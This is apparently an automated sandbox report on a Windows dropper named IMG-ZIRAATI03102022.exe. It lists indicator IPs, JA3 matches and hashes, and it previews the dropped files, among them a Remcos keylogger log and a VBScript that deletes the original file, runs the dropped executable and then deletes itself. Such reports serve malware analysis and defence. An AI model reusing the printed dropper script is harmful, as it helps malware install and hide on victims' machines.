                                                                                                                            • 144.76.136.153
                                                                                                                            http://89743677348987793490832904.xyzGet hashmaliciousBrowse
                                                                                                                            • 5.161.130.207
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            VkDJ.exeGet hashmaliciousBrowse
                                                                                                                            • 49.12.160.144
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            gDi307GEL8.exeGet hashmaliciousBrowse
                                                                                                                            • 144.76.136.153
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            b3qxSkoyqZ.exeGet hashmaliciousBrowse
                                                                                                                            • 144.76.136.153
                                                                                                                            seEj6LCl8Q.exeGet hashmaliciousBrowse
                                                                                                                            • 144.76.136.153

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            PO-13466.vbsGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            Inquiry list.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            PO ZY-ZXM-2022092901.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            Consignment Deatails BL and INV20220310.jsGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            5YmFurdck2.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            • 144.76.120.25

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\ProgramData\remcos\logs.dat

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):144
                                                                                                                            Entropy (8bit):3.3603882199736725
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:rnlTl+VlnlTlNLfyel5JWRal2Jl+7R0DAlBG45klovDl6v:WnrNe65YcIeeDAlOWAv
                                                                                                                            MD5:8D50CAC5C47AEDAA8F12371DCB3019E1
                                                                                                                            SHA1:489CCBE83765E5909CC0B129EBAEAB64E9259ECC
                                                                                                                            SHA-256:E9BA5FC1FDAE07157CAB390E07FBA70DA402C4739A3F34AD9E4AC893103359AD
                                                                                                                            SHA-512:576C15566DE7FD5BEC7CBEDF9A2D4962AC3187DBDD04EE78D6F569122CAD652ECEE05C79A717CCA8FECFC19F39CD63202A816EC582ED9D6C9BAC51D0A14776F1
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:....[.2.0.2.2./.1.0./.0.3. .1.6.:.0.4.:.4.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                            C:\ProgramData\work\FILE.EXE

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6656
                                                                                                                            Entropy (8bit):4.803080359911344
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:xMrTz+Z0v+epSnRb0u8+NvsfV12aArBpybvTFnU:xMlv+rRbj8+NEfVYaGC+
                                                                                                                            MD5:3B4A0B66D0415AF1E216224497C59B4B
                                                                                                                            SHA1:D5F559097A703F155BAD6B8610A48EA2DBD68B27
                                                                                                                            SHA-256:95C80A6ADD91050A965C4D38E3DB1736C7CFC8C286E87C9D1C3AEB46EE3A95DE
                                                                                                                            SHA-512:5A3AAD3AC6E0D3439900AA941AC69EB89C64F6DA9A48C289F08C37780E99FF2B0D95FB8511ACD2BCBB202F63A4004156CE662CB2F434731F6923465BB355DEB0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                            Reputation:low
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c............................^/... ........@.. ....................................@................................../..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@/......H........"..8...........................................................F...-.&(....+.&+.*...0..p.......s.....-.&+..+..o....t....r...po.....-.&.o....o.....1.+..+.~.....rA..p .......o....t....~.....(....&......o.....*........Zh......F...-.&(....+.&+.*.(....(....*F...-.&(....+.&+.*Ns.....-.&+.(....+.*BrO..p(....(....*....0..T....... .....-.&..(....+.&....(....o....o....(....s.....-.&+..+..o.....-.&...+..o.....&...*.(................9..H..........9O.......0.......... ..........-

                                                                                                                            C:\ProgramData\work\FILE.EXE:Zone.Identifier

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FILE.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1265
                                                                                                                            Entropy (8bit):5.351561006604618
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvUHKdHKu
                                                                                                                            MD5:A5954DA14DDC15175BD61315B8EA45C8
                                                                                                                            SHA1:688A976F957D800BEA0CAA5E25CA012C8DF79FAA
                                                                                                                            SHA-256:E90C9FE30AE1F10B8ACB2EE2477FBEED2A53E86923C9C57D8D91C17FFF18C3C0
                                                                                                                            SHA-512:35BAB190EBA159B03EC83F80E46EFCAD178F1BFF03DAC664EF4F69C2F29DF55FD9A035562EEC2B11320F367C569F2FC6A27DC4A57E8A866D3C2FFA601C439FE8
                                                                                                                            Malicious:false
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IMG-ZIRAATI03102022.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1265
                                                                                                                            Entropy (8bit):5.351561006604618
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvUHKdHKu
                                                                                                                            MD5:A5954DA14DDC15175BD61315B8EA45C8
                                                                                                                            SHA1:688A976F957D800BEA0CAA5E25CA012C8DF79FAA
                                                                                                                            SHA-256:E90C9FE30AE1F10B8ACB2EE2477FBEED2A53E86923C9C57D8D91C17FFF18C3C0
                                                                                                                            SHA-512:35BAB190EBA159B03EC83F80E46EFCAD178F1BFF03DAC664EF4F69C2F29DF55FD9A035562EEC2B11320F367C569F2FC6A27DC4A57E8A866D3C2FFA601C439FE8
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):961
                                                                                                                            Entropy (8bit):5.004495955747559
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:tkEIy+nd6CsGkMyGWKyMPVGADAFa5HEGYArpv/mOAaNO+ao9W7iN5zzkw7d+9JSl:qWydRNuKyM80vXhNlT3/7KckVlro
                                                                                                                            MD5:B81805C653E6E1FC9ABC3EE32E7FC0AD
                                                                                                                            SHA1:9049746F9AD55707006F85B1258B66F89AF0F5D9
                                                                                                                            SHA-256:6E269A29BC753B3746F45A857875050039D1EBB1BE58396C33565BCC1514A811
                                                                                                                            SHA-512:97B464EAD61BD49FADCFF8D8917E6C73AA43C6E79787324453C0F0CDC27E16E19CD25D9984FE69503EB3BF6704F5238E4A6F8E82E483C00AA5CA70236EB32EB9
                                                                                                                            Malicious:false
                                                                                                                            Preview:{. "geoplugin_request":"102.129.143.15",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Reston",. "geoplugin_region":"Virginia",. "geoplugin_regionCode":"VA",. "geoplugin_regionName":"Virginia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.9609",. "geoplugin_longitude":"-77.3429",. "geoplugin_locationAccuracyRadius":"500",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5829
                                                                                                                            Entropy (8bit):4.8968676994158
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                                            MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                                            SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                                            SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                                            SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                                            Malicious:false
                                                                                                                            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):15596
                                                                                                                            Entropy (8bit):5.535669201985557
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:Jte/q0OUJFvFO7KsSBxngjilrIKsFvIm74oumZ:cFv4j4xgmlrwCyPZ
                                                                                                                            MD5:0DE844F09B1A135F8BB6E6E17529C331
                                                                                                                            SHA1:1414596DAF4FBA58068D3D9D328EB559AEA3F3E6
                                                                                                                            SHA-256:DC67DB295981F1B5CD19BD6EA27137D9A07829F740ED1116A01A79150967AA62
                                                                                                                            SHA-512:538B4DAC97ADC47D6566539AB918B9E53D2311E7BF878714D83DDD2CC657DED3D0E86DC68B0BB567E5FFA70376D46FDFDDD5B90F770A05EA9FF61854AE336868
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e...........'.........*.....................................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eijp20js.dii.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:very short file (no magic)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:U:U
                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                            Malicious:false
                                                                                                                            Preview:1

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrha0431.05b.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:very short file (no magic)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:U:U
                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                            Malicious:false
                                                                                                                            Preview:1

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrxaxftx.vxf.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:very short file (no magic)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:U:U
                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                            Malicious:false
                                                                                                                            Preview:1

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvimo0ac.yrw.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:very short file (no magic)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1
                                                                                                                            Entropy (8bit):0.0
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:U:U
                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                            Malicious:false
                                                                                                                            Preview:1

                                                                                                                            C:\Users\user\AppData\Local\Temp\install.vbs

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):506
                                                                                                                            Entropy (8bit):3.6460493358817105
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:4D8o++ugypjBQMB3Dk3SbVG9ZvFQ4lOnbZHomOM/0aimi:4Dh+SMTk4VG9hFNObZlONait
                                                                                                                            MD5:00714D0FF82B5D71BC1F908DE9271417
                                                                                                                            SHA1:0C15F328A2E57D946FD3652CE2F856F3B13FBF3F
                                                                                                                            SHA-256:02179E1ADB87303ECD36A10CCA1BD16FD0B7E5802200B189D1AB74832A63B456
                                                                                                                            SHA-512:8036327431B46489DAFB688DD91461FDFFE3DA2CE1E8F1E17A59D8A0340C769621E0280ED0A37D85D7777DD33761158B15BCECA0194EF1EB079AEF5B5E4671F5
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            Preview:W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.\.I.M.G.-.Z.I.R.A.A.T.I.0.3.1.0.2.0.2.2...e.x.e."...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.o.r.k.\.F.I.L.E...E.X.E.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                                                                                                            C:\Users\user\AppData\Roaming\FILE.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6656
                                                                                                                            Entropy (8bit):4.803080359911344
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:xMrTz+Z0v+epSnRb0u8+NvsfV12aArBpybvTFnU:xMlv+rRbj8+NEfVYaGC+
                                                                                                                            MD5:3B4A0B66D0415AF1E216224497C59B4B
                                                                                                                            SHA1:D5F559097A703F155BAD6B8610A48EA2DBD68B27
                                                                                                                            SHA-256:95C80A6ADD91050A965C4D38E3DB1736C7CFC8C286E87C9D1C3AEB46EE3A95DE
                                                                                                                            SHA-512:5A3AAD3AC6E0D3439900AA941AC69EB89C64F6DA9A48C289F08C37780E99FF2B0D95FB8511ACD2BCBB202F63A4004156CE662CB2F434731F6923465BB355DEB0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c............................^/... ........@.. ....................................@................................../..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@/......H........"..8...........................................................F...-.&(....+.&+.*...0..p.......s.....-.&+..+..o....t....r...po.....-.&.o....o.....1.+..+.~.....rA..p .......o....t....~.....(....&......o.....*........Zh......F...-.&(....+.&+.*.(....(....*F...-.&(....+.&+.*Ns.....-.&+.(....+.*BrO..p(....(....*....0..T....... .....-.&..(....+.&....(....o....o....(....s.....-.&+..+..o.....-.&...+..o.....&...*.(................9..H..........9O.......0.......... ..........-

                                                                                                                            C:\Users\user\AppData\Roaming\FILE.exe:Zone.Identifier

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):4.803080359911344
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                            File name:IMG-ZIRAATI03102022.exe
                                                                                                                            File size:6656
                                                                                                                            MD5:3b4a0b66d0415af1e216224497c59b4b
                                                                                                                            SHA1:d5f559097a703f155bad6b8610a48ea2dbd68b27
                                                                                                                            SHA256:95c80a6add91050a965c4d38e3db1736c7cfc8c286e87c9d1c3aeb46ee3a95de
                                                                                                                            SHA512:5a3aad3ac6e0d3439900aa941ac69eb89c64f6da9a48c289f08c37780e99ff2b0d95fb8511acd2bcbb202f63a4004156ce662cb2f434731f6923465bb355deb0
                                                                                                                            SSDEEP:96:xMrTz+Z0v+epSnRb0u8+NvsfV12aArBpybvTFnU:xMlv+rRbj8+NEfVYaGC+
                                                                                                                            TLSH:4CD1D816E3D88673DDAA0B3698F3238103BCBB53A893D7AF4ED0110B5D56B444B61BB5
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c............................^/... ........@.. ....................................@................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x402f5e
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
